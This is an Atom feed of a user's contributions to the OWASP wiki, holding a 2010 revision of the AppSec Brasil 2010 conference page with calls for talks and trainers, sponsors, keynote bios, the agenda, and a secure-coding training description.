<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Thiagoalz</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Thiagoalz"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Thiagoalz"/>
		<updated>2026-04-25T11:43:40Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AppSec_Brasil_2010&amp;diff=87805</id>
		<title>AppSec Brasil 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AppSec_Brasil_2010&amp;diff=87805"/>
				<updated>2010-08-19T23:44:18Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: Copiando dados de português para ingles. Ainda falta traduzir.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
[[Image:LogoAppSecBrazil.002.jpg|center]] &lt;br /&gt;
&lt;br /&gt;
'''Para a versão em português, veja em [[AppSec Brasil 2010 (pt-br)]]''' &lt;br /&gt;
&lt;br /&gt;
= OWASP AppSec Brasil 2010  =&lt;br /&gt;
&lt;br /&gt;
The Second Edition of OWASP's flagship conference in South America will happen in Campinas, SP, Brazil. The Conference consists of two days of training sessions, followed by a two-day conference on a single track. &lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:AppSec Brasil 2010 Campinas.jpg|500px]] &lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
== Conference Dates  ==&lt;br /&gt;
&lt;br /&gt;
The conference will happen from '''November 16th, 2010 to November 19th, 2010'''. The first two days will be tutorial days (see below). Plenary sessions will be held on November 18th and 19th. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;'''&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0); font-size: 14pt&amp;quot;&amp;gt; Proposal submission deadline extended to Sep. 23th. &amp;lt;/span&amp;gt;''' &amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== About ====&lt;br /&gt;
&lt;br /&gt;
== About the conference ==&lt;br /&gt;
&lt;br /&gt;
Following the success of the first AppSec Brasil, held in Brasilia in 2009, the OWASP Brazilian Chapter is organizing its second edition in 2010. AppSec Brasil 2010 will happen in the city of Campinas, located 90 km from São Paulo. &lt;br /&gt;
&lt;br /&gt;
Campinas is the 3rd biggest city in the State of São Paulo and is an important economic center and hosts major universities and research centers. It is known to concentrate several high tech industries, including important multi-national companies in the fields of electronics, telecom and chemicals. &lt;br /&gt;
&lt;br /&gt;
This year, we expect to gather a number of Brazilian and Latin American practitioners and researchers to share state-of-the-art information about application security. &lt;br /&gt;
&lt;br /&gt;
==== Calls ====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
**DEADLINE EXTENDED - 23 August**&lt;br /&gt;
**OWASP APPSEC BRASIL 2010**&lt;br /&gt;
**CALL FOR PRESENTATIONS**&lt;br /&gt;
&lt;br /&gt;
Colleagues,&lt;br /&gt;
&lt;br /&gt;
OWASP is currently soliciting presentations for the OWASP AppSec Brasil&lt;br /&gt;
2010 Conference that will take&lt;br /&gt;
place at CPqD Foundation in Campinas, SP, Brazil on November 16th&lt;br /&gt;
through 19th, 2010.  There will be&lt;br /&gt;
training courses on November 16th and 17th followed by plenary sessions&lt;br /&gt;
on the 18th and 19th with each&lt;br /&gt;
day having one single track.&lt;br /&gt;
&lt;br /&gt;
We are seeking people and organizations that want to present on any of&lt;br /&gt;
the following topics (in no particular order):&lt;br /&gt;
- - Application Threat Modeling&lt;br /&gt;
- - Business Risks with Application Security&lt;br /&gt;
- - Hands-on Source Code Review&lt;br /&gt;
- - Metrics for Application Security&lt;br /&gt;
- - OWASP Tools and Projects&lt;br /&gt;
- - Privacy Concerns with Applications and Data Storage&lt;br /&gt;
- - Secure Coding Practices (J2EE/.NET)&lt;br /&gt;
- - Starting and Managing Secure Development Lifecycle Programs&lt;br /&gt;
- - Technology specific presentations on security such as AJAX, XML, etc&lt;br /&gt;
- - Web Application Security countermeasures&lt;br /&gt;
- - Web Application Security Testing&lt;br /&gt;
- - Web Services-, XML- and Application Security&lt;br /&gt;
- - Anything else relating to OWASP and Application Security&lt;br /&gt;
&lt;br /&gt;
To make a submission you must fill out the form available&lt;br /&gt;
at http://www.owasp.org/images/f/f7/OWASP_AppSec_Brasil_2010_CFP.rtf.zip&lt;br /&gt;
and submit&lt;br /&gt;
through the easychair conference interface at&lt;br /&gt;
http://www.easychair.org/conferences/?conf=appsecbr2010&lt;br /&gt;
&lt;br /&gt;
Each presenter will have 45 minutes for the presentation, followed by 10&lt;br /&gt;
minutes reserved for&lt;br /&gt;
questions from the audience. The presentations must respect the&lt;br /&gt;
restrictions of the OWASP Speaker Agreement.&lt;br /&gt;
&lt;br /&gt;
**Important Dates:**&lt;br /&gt;
Submission deadline is August 23, 2010 at 11:59 PM (UTC/GMT -3).&lt;br /&gt;
Notification of acceptance is September 8, 2010.&lt;br /&gt;
Presentation slides are due September 30, 2010.&lt;br /&gt;
&lt;br /&gt;
The conference organization team may be contacted by email at&lt;br /&gt;
organizacao2010 (at) appsecbrasil.org&lt;br /&gt;
&lt;br /&gt;
For more information, please see the following web pages:&lt;br /&gt;
&lt;br /&gt;
Conference Website:&lt;br /&gt;
 https://www.owasp.org/index.php/AppSec_Brasil_2010&lt;br /&gt;
&lt;br /&gt;
OWASP Speaker Agreement:&lt;br /&gt;
 http://www.owasp.org/index.php/Speaker_Agreement&lt;br /&gt;
&lt;br /&gt;
OWASP Website:&lt;br /&gt;
 http://www.owasp.org&lt;br /&gt;
&lt;br /&gt;
Easychair conference site:&lt;br /&gt;
 http://www.easychair.org/conferences/?conf=appsecbr2010&lt;br /&gt;
&lt;br /&gt;
Presentation proposal form:&lt;br /&gt;
 http://www.owasp.org/images/f/f7/OWASP_AppSec_Brasil_2010_CFP.rtf.zip&lt;br /&gt;
&lt;br /&gt;
********** WARNING: Submissions without the information requested in the&lt;br /&gt;
 proposal form will not be considered ************&lt;br /&gt;
&lt;br /&gt;
Please forward to all interested practitioners and colleagues&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
== Call for training providers ==&lt;br /&gt;
&amp;lt;pre&amp;gt;**OWASP APPSEC BRASIL 2010**&lt;br /&gt;
**CALL FOR TRAINING SESSIONS**&lt;br /&gt;
&lt;br /&gt;
Colleagues,&lt;br /&gt;
&lt;br /&gt;
OWASP is currently soliciting training proposals for the OWASP&lt;br /&gt;
AppSec Brazil 2010 Conference which will take place at Fundação CPqD&lt;br /&gt;
in Campinas, SP, Brazil, on November 16 through November 19, 2010.&lt;br /&gt;
There will be training courses on November 16 and 17 followed by&lt;br /&gt;
plenary sessions on the 18 and 19 with one single track per day.&lt;br /&gt;
&lt;br /&gt;
We are seeking training proposals on the following topics (in no&lt;br /&gt;
particular order):&lt;br /&gt;
- Application Threat Modeling - Business Risks with Application Security&lt;br /&gt;
- Hands-on Source Code Review&lt;br /&gt;
- Metrics for Application Security&lt;br /&gt;
- OWASP Tools and Projects&lt;br /&gt;
- Privacy Concerns with Applications and Data Storage&lt;br /&gt;
- Secure Coding Practices (J2EE/.NET)&lt;br /&gt;
- Starting and Managing Secure Development Lifecycle Programs&lt;br /&gt;
- Technology specific presentations on security such as AJAX, XML, etc&lt;br /&gt;
- Web Application Security countermeasures&lt;br /&gt;
- Web Application Security Testing&lt;br /&gt;
- Web Services, XML- and Application Security&lt;br /&gt;
- Anything else relating to OWASP and Application Security&lt;br /&gt;
&lt;br /&gt;
Proposals on topics not listed above but related to the conference&lt;br /&gt;
(i.e. which are related to Application Security) may also be accepted.&lt;br /&gt;
&lt;br /&gt;
To make a submission you must fill out the form available at&lt;br /&gt;
http://www.owasp.org/images/1/1a/OWASP_AppSec_Brasil_2010_CFT.rtf.zip&lt;br /&gt;
and submit by email to organizacao2010@appsecbrasil.org&lt;br /&gt;
&lt;br /&gt;
There may be 1 or 2-day courses. The proposals must respect the&lt;br /&gt;
restrictions of the OWASP Speaker Agreement. The conference will&lt;br /&gt;
reward trainers with at least 30% of the total revenue of their&lt;br /&gt;
courses, based on a minimum attendance. Courses that attract more&lt;br /&gt;
students may be granted higher percentages. No other compensation&lt;br /&gt;
(such as tickets or lodging) will be provided. If you require a&lt;br /&gt;
different arrangement, please contact the conference chair at the&lt;br /&gt;
email address below.&lt;br /&gt;
&lt;br /&gt;
**Compensation**&lt;br /&gt;
Instructors and authors will be paid based on the number of students&lt;br /&gt;
in their training sessions. If the training gathers only the minimum&lt;br /&gt;
number of students, the compensation will be 30% of the revenue. For&lt;br /&gt;
each group of 10 extra students enrolled, the compensation will be&lt;br /&gt;
increased by 5% of the revenue, up to a maximum of 45% of the training&lt;br /&gt;
revenue. For example, a 1-day training with 10 to 19 students will&lt;br /&gt;
generate a compensation of 30% of the revenue. For classes of 20 to 29&lt;br /&gt;
students, the compensation raises to 35% percent of the revenue.&lt;br /&gt;
&lt;br /&gt;
In exceptional cases, different compensation schemes may be accepted.&lt;br /&gt;
Please contact the conference organization team by email&lt;br /&gt;
(organizacao2010@appsecbrasil.org) for details.&lt;br /&gt;
&lt;br /&gt;
**Training cost**&lt;br /&gt;
 1-day training: R$ 450 per student&lt;br /&gt;
 2-day training: R$ 900 per student&lt;br /&gt;
All prices in Brazilian Reais (BRL)&lt;br /&gt;
&lt;br /&gt;
**Minimum number of students**&lt;br /&gt;
 1-day trainings: 10 students&lt;br /&gt;
 2-day trainings: 20 students&lt;br /&gt;
&lt;br /&gt;
**Important Dates:**&lt;br /&gt;
 Submission deadline is July 26, 2010, at 11:59 PM (UTC/GMT-3).&lt;br /&gt;
 Notification of acceptance will be August 16, 2010.&lt;br /&gt;
 Final version is due September 15, 2010.&lt;br /&gt;
&lt;br /&gt;
The conference organization team may be contacted by email at&lt;br /&gt;
organizacao2010 (at) appsecbrasil.org&lt;br /&gt;
&lt;br /&gt;
For more information, please see the following web pages:&lt;br /&gt;
 Conference Website: https://www.owasp.org/index.php/AppSec_Brasil_2010&lt;br /&gt;
 OWASP Speaker Agreement: http://www.owasp.org/index.php/Speaker_Agreement&lt;br /&gt;
 OWASP Website: http://www.owasp.org&lt;br /&gt;
 Easychair conference site:&lt;br /&gt;
http://www.easychair.org/conferences/?conf=appsecbr2010&lt;br /&gt;
 Presentation proposal form:&lt;br /&gt;
http://www.owasp.org/images/1/1a/OWASP_AppSec_Brasil_2010_CFT.rtf.zip&lt;br /&gt;
&lt;br /&gt;
********** WARNING: Submissions without all the information requested&lt;br /&gt;
in the proposal form will not be considered ************&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Sponsorship  ====&lt;br /&gt;
&lt;br /&gt;
We are currently soliciting sponsors for the AppSec Brasil 2010 Conference. Detailed [[Media:OWASP_-_Sponsorship_Opportunities_-_EN_V.1.2.pdf|sponsorship oportunities]] are now available. &lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring AppSec Brasil 2010, please contact the Conference Organization Team (organizacao2010@appsecbrasil.org). &lt;br /&gt;
&lt;br /&gt;
== Sponsors  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Platinum Sponsors  ==&lt;br /&gt;
{|&lt;br /&gt;
| [[Image:AppSec Brasil 2010 CPQD.jpg|200px|link=http://www.cpqd.com.br]]&lt;br /&gt;
|-&lt;br /&gt;
| &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
== Gold Sponsors  ==&lt;br /&gt;
{|&lt;br /&gt;
| [[Image:LeadComm Logo Screen.jpg|150px|link=http://www.leadcomm.com.br]]&lt;br /&gt;
| width=&amp;quot;50&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
| [[Image:Logo PagSeguro-Uma empresa-UOL.jpg|150px|link=http://www.pagseguro.uol.com.br]]&lt;br /&gt;
|-&lt;br /&gt;
| &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Silver Sponsors  ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Attendee Kit Sponsors  ===&lt;br /&gt;
{|&lt;br /&gt;
| [[Image:Logotipo_Conviso_2009_Cor.png|150px]]&lt;br /&gt;
| width=&amp;quot;50&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
| [[Image:lgClavis.png|110px|link=http://www.clavis.com.br]]&lt;br /&gt;
|-&lt;br /&gt;
| &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Promoted by  ==&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Appsec Brasil 2010 InstitutoTuring.png]] &lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
==== Keynotes  ====&lt;br /&gt;
&lt;br /&gt;
==Robert 'Rsnake' Hansen ==&lt;br /&gt;
&lt;br /&gt;
[http://www.sectheory.com/ SecTheory]&lt;br /&gt;
&lt;br /&gt;
''Title:'' '''TBD.'''&lt;br /&gt;
&lt;br /&gt;
''Bio:'' Robert Hansen aka RSnake is the CEO and founder of SecTheory. He has worked for Digital Island, Exodus Communications and Cable &amp;amp; Wireless in varying roles from Sr. Security Architect and eventually product managing many of the managed security services product lines.  He also worked at eBay as a Sr. Global Product Manager of Trust and Safety, focusing on anti-phishing, anti-DHTML malware and anti-virus strategies.  Later he worked as a director of product management for Realtor.com.  Robert sits on the advisory board for the Intrepidus Group, previously sat on the technical advisory board of ClickForensics and currently contributes to the security strategy of several startup companies.&lt;br /&gt;
&lt;br /&gt;
Mr. Hansen wrote Detecting Malice, authors content on O'Reilly and co-authored &amp;quot;XSS Exploits&amp;quot; by Syngress publishing.  He sits on the NIST.gov Software Assurance Metrics and Tool Evaluation group focusing on web application security scanners and the Web Application Security Scanners Evaluation Criteria (WASC-WASSEC) group.  He also has briefed the DoD at the Pentagon and speaks at SourceBoston, Secure360, GFIRST/US-CERT, CSI, Toorcon, APWG, ISSA, TRISC, World OWASP/WASC conferences, SANS, Microsoft's Bluehat, Blackhat, DefCon, SecTor, BSides, Networld+Interop, and has been the keynote speaker at the New York Cyber Security Conference, NITES and OWASP Appsec Asia.  Mr. Hansen is a member of Infragard, West Austin Rotary, WASC, IACSP, APWG, contributed to the OWASP 2.0 guide and is on the OWASP Connections Committee.&lt;br /&gt;
&lt;br /&gt;
Robert also maintains the http://ha.ckers.org website where he discuss web application security and provides lots of useful content to be used against web application attacks.&lt;br /&gt;
&lt;br /&gt;
== Jeremiah Grossman ==&lt;br /&gt;
&lt;br /&gt;
[http://www.whitehatsec.com/ WhiteHat Security] &lt;br /&gt;
&lt;br /&gt;
''Title:'' '''TBD.''' &lt;br /&gt;
&lt;br /&gt;
''Bio:'' Jeremiah Grossman, founder and CTO, WhiteHat Security, is a world-renowned Web security expert. A co-founder of the Web Application Security Consortium (WASC), he was named to InfoWorld's Top 25 CTOs in 2007 and is frequently quoted by business and technical media. He has authored dozens of articles and whitepapers, is credited with the discovery of many cutting-edge attack and defensive techniques, and is a co-author of &amp;quot;XSS Attacks: Cross Site Scripting Exploits and Defense.&amp;quot; Grossman is also an influential blogger who offers insight and encourages open dialogue regarding Web security research and trends. Prior to WhiteHat, Grossman was an information security officer at Yahoo! &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Agenda  ====&lt;br /&gt;
&lt;br /&gt;
== Conference Program - Day 1 - November 18th 2010  ==&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
{| width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 08:30 - 09:00 &lt;br /&gt;
| bgcolor=&amp;quot;#8595c2&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Reception Desk Open'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 09:00 - 09:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Opening Ceremony'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;49&amp;quot; align=&amp;quot;right&amp;quot; | 09:30 - 10:30 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Dinis Cruz'''&amp;lt;br&amp;gt; About OWASP&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 10:50 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;49&amp;quot; align=&amp;quot;right&amp;quot; | 10:50 - 12:20 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Robert 'RSnake' Hansen'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 12:20 - 14:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Lunch Break'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 14:00 - 14:50 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD&amp;lt;br&amp;gt;''' TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 14:50 - 15:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD&amp;lt;br&amp;gt;''' TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 15:40 - 16:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 16:00 - 16:50 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD&amp;lt;br&amp;gt;''' TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 16:50 - 17:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD&amp;lt;br&amp;gt;''' TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 17:40 - 18:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Invited Speaker'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 18:30 - 18:35 &lt;br /&gt;
| bgcolor=&amp;quot;#cccccc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''End of the First Day'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Conference Program - Day 2 - November 19th 2010 ==&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
{| width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 08:30 - 09:00 &lt;br /&gt;
| bgcolor=&amp;quot;#8595c2&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Reception Desk Open'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 09:00 - 10:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Jeremiah Grossman'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 10:50 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 11:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 11:40 - 12:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 12:30 - 14:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Lunch Break'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 14:00 - 14:50 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Invited Speaker'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 14:50 - 15:40 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 15:40 - 16:10 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Cel. Monclaro'''&amp;lt;br&amp;gt; Presentation of RENASIC&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 16:10 - 16:30 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 16:30 - 17:20 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 17:20 - 18:10 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''TBD'''&amp;lt;br&amp;gt; TBD&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 18:10 - 18:30 &lt;br /&gt;
| bgcolor=&amp;quot;#cccccc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''End of the Conference'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Trainings ====&lt;br /&gt;
&lt;br /&gt;
[[Image:Aspect logo.png]] &lt;br /&gt;
&lt;br /&gt;
=== '''Secure Coding for J2EE Applications''' ===&lt;br /&gt;
&lt;br /&gt;
[[Image:Jasonli appsecBR2010.jpg|frame]] '''Date and time: November 16th and 17th'''&amp;lt;br&amp;gt; '''Instructor: Jason Li'''&amp;lt;br&amp;gt; '''Summary'''&amp;lt;br&amp;gt; Training developers on secure coding practices offers one of the highest returns on investment of any security investment by eliminating vulnerabilities at the source. Aspect’s Java EE Secure Coding Training raises developer awareness of application security issues and provides examples of ‘what to do’ and ‘what not to do.' The class is lead by an experienced developer and is delivered in a very interactive manner. This class includes hands-on exercises where the students get to perform security analysis and testing on a live Java EE web application. This specially designed environment includes deliberate flaws the students have to find, diagnose, and fix. The class also uses Java EE coding exercises to provide students with realistic hands-on secure coding experience. Students gain hands-on experience using freely available web application security test tools to find and diagnose flaws and learn to avoid them in their own code.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Audience'''&amp;lt;br&amp;gt; The intended audience for this course is intended for Java EE software developers and Java EE software testers who know how to program.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Learning Objectives'''&amp;lt;br&amp;gt; At the highest level, the objective for this course is to ensure that developers are capable of designing, building, and testing secure Java EE applications and understand why this is important.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Topics'''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*'''HTTP Fundamentals'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Understand and be able to employ the security features involved with using HTTP (e.g., headers, cookies, SSL)&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Design Principles and Patterns'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Understand and be able to apply application security design principles.&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Threats'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Be able to identify and explain common web application security threats (e.g. , cross-site scripting, SQL injection, denial of service attacks, &amp;quot;Man-in-the-middle&amp;quot; attacks, etc.) and implement mitigation techniques.&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Authentication and Session Management'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Be able to handle credentials securely while providing the full range of authentication support functions, including login, change password, forgot password, remember password, logout, reauthentication, and timeouts.&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Access Control'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Be able to implement access control rules for the user interface, business logic, and data layers.&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Input Validation'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Be able to recognize potential input validation issues, particularly injection and Cross-site Scripting (XSS) problems, and implement appropriate input validation mechanisms for user input and other sources of input.&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Command Injection'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Understand the dangers of command injection and techniques for avoiding the introduction of this type vulnerability.&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Error Handling'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Be able to implement a consistent error (exception) handling and logging approach for an entire web application.&amp;lt;br&amp;gt; &lt;br /&gt;
*'''Cryptography'''&amp;lt;br&amp;gt; &lt;br /&gt;
**Learn when to apply cryptographic techniques and be able to choose algorithms and use encryption/decryption and hash functions securely.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Jason’s Bio'''&amp;lt;br&amp;gt; Jason is a remarkable trainer, mastering five different training courses within a year’s time to our most valuable longstanding but diverse clients. The client base included a large financial institution, several leading shipping and logistics Management Company, and a leading Government systems integrator.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Jason has also taught Advanced Web Application Security Testing and Building Secure Web Applications classes at OWASP 2008 conferences in Belgium and India.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common remarks returned from Jason’s class evaluations include '''“This is probably one of the most important classes I‘ve been exposed to here”''' and '''“One of the best instructors I’ve ever had. Really knowledgeable of the subject. Kept class interested by sharing real life examples that depicted good scenarios”'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
